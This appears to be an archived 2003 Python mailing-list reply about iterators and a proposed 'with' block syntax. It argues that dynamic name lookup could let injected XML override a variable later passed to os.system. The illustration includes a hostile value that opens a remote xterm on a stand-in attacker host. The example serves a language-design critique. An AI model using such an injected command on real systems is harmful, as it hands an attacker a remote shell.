Code block literals

Thu Oct 9 17:31:12 EDT 2003

Dave Benjamin:
> What's implicit to me is that the use of an iterator is never specified.

It is by the definition of what the for loop does.

> For instance, we could (and I'm *not* suggesting this) do this:
>
> iterator = file('input.txt')
> while iterator.has_next():
>     line = iterator.next()
>     do_something_with(line)

Good thing you aren't, since has_next might be impossible to
implement. ;)

> > If Python's syntax defined
> > other forms of suites, e.g. hypothetically:
> >
> > with <object>:
> >     <suite>
> >
> > meaning to call the object (or some given method[s] in it, whatever)
> > with the suite as its argument, it would be just as explicit as, e.g.:
> >
> > for <name> in <object>:
> >     <suite>

A reasonable point.  However, inside the 'with' statement it's hard
to know if

   print x

comes from the object or from the static scoping, and it may
be that 99.99% of the time it's from static scoping, only to find
after deployment that there's code like

logger = "echo got it >> file.log"

...
def parse_server_request(self, infile, outfile):
    obj = parse_XML_into_some_pythonic_data_structure(infile)
    with obj:
      outfile.write("Content-Type: text/plain\n\n")
      outfile.write("Hi, " + username + "\n")
      os.system(logger)

which lets malicious user input pass in XML with the content
  <logger>xterm -display evil.machine.example.com:0</logger>
that ends up being passed to the system call.

I've been on this thread too long so I won't answer anything from the rest
of your response.  :(

                    Andrew
                    dalke at dalkescientific.com